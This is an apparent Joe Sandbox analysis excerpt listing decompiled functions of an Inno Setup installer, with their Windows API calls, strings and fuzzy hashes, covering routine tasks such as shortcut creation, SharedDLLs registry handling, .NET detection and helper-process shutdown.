API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
String ID: .lnk$.pif$.url$Creating the icon.$Desktop.ini$Dest filename: %s$Successfully created the icon.$target.lnk${group}\
API String ID: 971782779-2902529204
Opcode ID: c8d3714330c821f44f5f542ed692b99ce225314bcf0a3c632e85185b5bf0d038
Instruction ID: 2511324a254e809fb6cb6e6df698c04f534d896ef770860fda33365643b674db
Opcode Fuzzy Hash: c8d3714330c821f44f5f542ed692b99ce225314bcf0a3c632e85185b5bf0d038
Instruction Fuzzy Hash: 6FD12434A001499FDB01EFA9D582BDDBBF4EF08305F50806AF804B7392D6789E45DB69

Function 00498AA8 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,00498E40,?,?,00000000,?,00000000,00000000,?,004991F7,00000000,00499201,?,00000000), ref: 00498B2B
CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498E40,?,?,00000000,?,00000000,00000000,?,004991F7,00000000), ref: 00498B3E
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498E40,?,?,00000000,?,00000000,00000000), ref: 00498B4E
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498B6F
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498E40,?,?,00000000,?,00000000), ref: 00498B7F

Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,00456126,00000000,0045618E), ref: 0042D491

Strings

.msg, xrefs: 00498BA2
Setup, xrefs: 00498B17
.lst, xrefs: 00498BBC
/REG, xrefs: 00498ADD
/REGU, xrefs: 00498B01
Inno-Setup-RegSvr-Mutex, xrefs: 00498B35

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 2000705611-3672972446
Opcode ID: 167a4925d39714e1db2cb64cb8e851eafa481197125dc3165488ab0222a1c079
Instruction ID: c4cf27df87ac7a7b4ea6ef339e5ba87e8767b77ee3c6798ab53da9e3a0f24a8a
Opcode Fuzzy Hash: 167a4925d39714e1db2cb64cb8e851eafa481197125dc3165488ab0222a1c079
Instruction Fuzzy Hash: 09919330A042449FDF11EB69D852FAE7BA5EB4A304F51447AF400E72D2CA7CAC05CB6D

Function 0045A780 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0045AA3C,?,?,?,?,?,00000006,?,00000000,00497F35,?,00000000,00497FD8), ref: 0045A8EE

Strings

.hlp, xrefs: 0045A7B7
.chm, xrefs: 0045A81C
Deleting file: %s, xrefs: 0045A88D
The file appears to be in use (%d). Will delete on restart., xrefs: 0045A937
.fts, xrefs: 0045A7F4
Stripped read-only attribute., xrefs: 0045A8C7
.chw, xrefs: 0045A835
Failed to delete the file; it may be in use (%d)., xrefs: 0045A9DD
Failed to strip read-only attribute., xrefs: 0045A8D3
.gid, xrefs: 0045A7D0
.lnk, xrefs: 0045A85B

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 1452528299-3112430753
Opcode ID: 8a7e70ed7d2802cf2d1f154f993020eede7d014e1a3a8bb25d69fafc5e35e5ca
Instruction ID: 47b20d326fd82fe6504d69cf898c82eeddf784bf4f3b73b35613650615bf039f
Opcode Fuzzy Hash: 8a7e70ed7d2802cf2d1f154f993020eede7d014e1a3a8bb25d69fafc5e35e5ca
Instruction Fuzzy Hash: D171A030B042546BDB00EB6988827AE7BA49F48305F50856BFC01EB383CB7CDE59C75A

Function 0045CC68 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 0045CC82
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CCA2
GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CCAF
GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CCBC
GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CCCA

Part of subcall function 0045CB70: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CC0F,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CBE9

AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CEBD,?,?,00000000), ref: 0045CD83
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CEBD,?,?,00000000), ref: 0045CD8C

Strings

W, xrefs: 0045CD9A
GetNamedSecurityInfoW, xrefs: 0045CCA9
advapi32.dll, xrefs: 0045CC9D
SetNamedSecurityInfoW, xrefs: 0045CCB6
SetEntriesInAclW, xrefs: 0045CCC4

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
API String ID: 59345061-4263478283
Opcode ID: c6057923a5b4aa5def86807270a108e59673eb775b044adeceaa0b76775d665d
Instruction ID: e70f229ab34f11e3bb96b7fa9db8dd957f06ce772e443448e3a5811e0bd6c06d
Opcode Fuzzy Hash: c6057923a5b4aa5def86807270a108e59673eb775b044adeceaa0b76775d665d
Instruction Fuzzy Hash: BA5195B1900704EFDB10DF99C881BEEB7B9EB48715F14806AF915F7282C2789945CF69

Function 0041B3BC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0041B3D3
CreateCompatibleDC.GDI32(00000000), ref: 0041B3DD
GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B406
GetDC.USER32(00000000), ref: 0041B412
CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B43F
ReleaseDC.USER32(00000000,00000000), ref: 0041B465
SelectObject.GDI32(00000000,?), ref: 0041B480
SelectObject.GDI32(?,00000000), ref: 0041B48F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
SelectObject.GDI32(?,00000000), ref: 0041B4D7
DeleteDC.GDI32(00000000), ref: 0041B4E0
DeleteDC.GDI32(?), ref: 0041B4E9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: a07e3cbb24df5042cba66812f0bcbe2bed2d5bf396793bbd6052f972fec3ec6c
Instruction ID: 6b909a1540c808143a27ece7eebc35972739c5532850bae840edfb4e77f88e68
Opcode Fuzzy Hash: a07e3cbb24df5042cba66812f0bcbe2bed2d5bf396793bbd6052f972fec3ec6c
Instruction Fuzzy Hash: 5641CE71E44609AFDB10DAE9C846FEFB7BCEB08704F104466B614F7282C7786D408BA8

Function 004548E8 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegQueryValueExA.ADVAPI32(0045AC12,00000000,00000000,?,00000000,?,00000000,00454B81,?,0045AC12,00000003,00000000,00000000,00454BB8), ref: 00454A01

Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004532E7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7

RegQueryValueExA.ADVAPI32(0045AC12,00000000,00000000,00000000,?,00000004,00000000,00454ACB,?,0045AC12,00000000,00000000,?,00000000,?,00000000), ref: 00454A85
RegQueryValueExA.ADVAPI32(0045AC12,00000000,00000000,00000000,?,00000004,00000000,00454ACB,?,0045AC12,00000000,00000000,?,00000000,?,00000000), ref: 00454AB4

Strings

Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454958
, xrefs: 00454972
RegOpenKeyEx, xrefs: 00454984
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045491F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: QueryValue$FormatMessageOpen
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2812809588-1577016196
Opcode ID: 395617bcc71a058ce69bc2fb35d8539d5a61a7e9adf83235d3b102da95ca348f
Instruction ID: f9892de48a8f191bc49ac76cf4be280f3350b447777e8b89a87aacf0c036b8b5
Opcode Fuzzy Hash: 395617bcc71a058ce69bc2fb35d8539d5a61a7e9adf83235d3b102da95ca348f
Instruction Fuzzy Hash: 31912571E44208ABDB41DB95C941BDEB7FCEB89309F10447BF900FB282D6789E458B69

Function 00459500 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045940C: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459549,00000000,00459701,?,00000000,00000000,00000000), ref: 00459459

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459701,?,00000000,00000000,00000000), ref: 004595A7
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459701,?,00000000,00000000,00000000), ref: 00459611

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459701,?,00000000,00000000,00000000), ref: 00459678

Strings

.NET Framework version %s not found, xrefs: 004596B1
v1.1.4322, xrefs: 0045966A
.NET Framework not found, xrefs: 004596C5
v4.0.30319, xrefs: 00459599
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004595C4
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 0045955A
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 0045962B
v2.0.50727, xrefs: 00459603

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Close$Open
String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
API String ID: 2976201327-446240816
Opcode ID: 1c3e49b20786f7f4c067717ed1f3da7ced3b3e07ab1076f2c4b46178acdaa376
Instruction ID: 13449528a83cd7bd3976393389562d3fcc4363bdf2ba35ed2198dacadad7a936
Opcode Fuzzy Hash: 1c3e49b20786f7f4c067717ed1f3da7ced3b3e07ab1076f2c4b46178acdaa376
Instruction Fuzzy Hash: FC51B135A04145EBCB01DF64C8A1BEE77A6DB89305F54447BE8019B393EB3D9E0E8B18

Function 00458AEC Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00458B23
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458B3F
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458B4D
GetExitCodeProcess.KERNEL32(?), ref: 00458B5E
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458BA5
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458BC1

Strings

Helper process exited with failure code: 0x%x, xrefs: 00458B8B
Stopping 64-bit helper process. (PID: %u), xrefs: 00458B15
Helper process exited., xrefs: 00458B6D
Helper process exited, but failed to get exit code., xrefs: 00458B97
Helper isn't responding; killing it., xrefs: 00458B2F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: 580926d47f07d23538b7e0810c5f2f20b36629562999f9b1b12c58acf7172f57
Instruction ID: 7e49c79e8349cf5087e4bea88bd9331b7e76427b7ebfc1862ecfa5aa0db55867
Opcode Fuzzy Hash: 580926d47f07d23538b7e0810c5f2f20b36629562999f9b1b12c58acf7172f57
Instruction Fuzzy Hash: 462162706047409BC760E77DC442B5B76D89F44305F008C2EB999E7283DF7CE8489B6A

Function 0045459C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00454773,?,00000000,00454837), ref: 004546C3
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00454773,?,00000000,00454837), ref: 004547FF

Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004532E7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7

Strings

Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004545DB
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045460B
RegCreateKeyEx, xrefs: 00454637
, xrefs: 00454625

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateFormatMessageQueryValue
String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2481121983-1280779767
Opcode ID: 75279f6a64a083a2a8abdb50c603dbef55240c28a0755e1e1ae0767c4fdccaa3
Instruction ID: dcb2efb4518004930bb79e36ff4c26a26f41c5c3291808b61d16842317edebf7
Opcode Fuzzy Hash: 75279f6a64a083a2a8abdb50c603dbef55240c28a0755e1e1ae0767c4fdccaa3
Instruction Fuzzy Hash: E6810175A00209AFDB00EFD5C941BEEB7B9EB49305F50442AF900FB282D7789A45CB69

Function 00497328 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00453930: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004974F9,_iu,?,00000000,00453A6A), ref: 00453A1F
Part of subcall function 00453930: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004974F9,_iu,?,00000000,00453A6A), ref: 00453A2F

CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004973A5
SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004974F9), ref: 004973C6
CreateWindowExA.USER32(00000000,STATIC,00497508,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004973ED
SetWindowLongA.USER32(?,000000FC,00496B80), ref: 00497400
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004974CC,?,?,000000FC,00496B80,00000000,STATIC,00497508), ref: 00497430
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004974A4
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004974CC,?,?,000000FC,00496B80,00000000), ref: 004974B0

Part of subcall function 00453DA4: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E8B

DestroyWindow.USER32(?,004974D3,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004974CC,?,?,000000FC,00496B80,00000000,STATIC), ref: 004974C6

Strings

STATIC, xrefs: 004973E6
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 0049745F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 1549857992-2312673372
Opcode ID: 0ab8c79763325155dd79793700a727a6f2b3fb3e9c7f7600a3a4c1d4aca0dfea
Instruction ID: a44cfd94a4b3d096a525e7606d5a2dde299b278b8d360b581aa2f7a861fbb15f
Opcode Fuzzy Hash: 0ab8c79763325155dd79793700a727a6f2b3fb3e9c7f7600a3a4c1d4aca0dfea
Instruction Fuzzy Hash: 1A414370A54208AFDF00EFA5DC52F9E7BB8EB09714F514576F900F7292D6799A00CB68

Function 00462A98 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00462AA4
GetModuleHandleA.KERNEL32(user32.dll), ref: 00462AB8
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462AC5
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462AD2
GetWindowRect.USER32(?,00000000), ref: 00462B1E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462B5C

Strings

GetMonitorInfoA, xrefs: 00462ACC
user32.dll, xrefs: 00462AB3
(, xrefs: 00462AFD
MonitorFromWindow, xrefs: 00462ABF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: f4d6e5fad0b29dbe73c49a3dd9bbec29a3ac53327e7f71340f51527231a6598f
Instruction ID: 79ef3469d7d3f88cabd24b86f5758d16992ed885f8e8d733778c3d92ea40af4d
Opcode Fuzzy Hash: f4d6e5fad0b29dbe73c49a3dd9bbec29a3ac53327e7f71340f51527231a6598f
Instruction Fuzzy Hash: F6219276B05A046BD600DE68CD81F7B3799DB88F14F09052AF944DB3C2EAB8ED004B5A

Function 0042F1E8 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042F1F4
GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F208
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F215
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F222
GetWindowRect.USER32(?,00000000), ref: 0042F26E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F2AC

Strings

user32.dll, xrefs: 0042F203
GetMonitorInfoA, xrefs: 0042F21C
(, xrefs: 0042F24D
MonitorFromWindow, xrefs: 0042F20F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: 7dac0dfa7658a4558a2e8796b90453688b6c981995994b626f0caacaebe10860
Instruction ID: cafee556b4ff86616240ec82e2754e32886365cebaf319099c414f584e750c92
Opcode Fuzzy Hash: 7dac0dfa7658a4558a2e8796b90453688b6c981995994b626f0caacaebe10860
Instruction Fuzzy Hash: 3421D77A704614ABD300D664DD81F3B33E4DB89B14F89057AFD40DB381DA79DC084BA9

Function 00458CC4 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458EA3,?,00000000,00458F06,?,?,02123858,00000000), ref: 00458D21
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458E38,?,00000000,00000001,00000000,00000000,00000000,00458EA3), ref: 00458D7E
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458E38,?,00000000,00000001,00000000,00000000,00000000,00458EA3), ref: 00458D8B
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458DD7
GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458E11,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458E38,?,00000000), ref: 00458DFD
GetLastError.KERNEL32(?,?,00000000,00000001,00458E11,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458E38,?,00000000), ref: 00458E04

Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513

Strings

TransactNamedPipe, xrefs: 00458D97
CreateEvent, xrefs: 00458D2F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

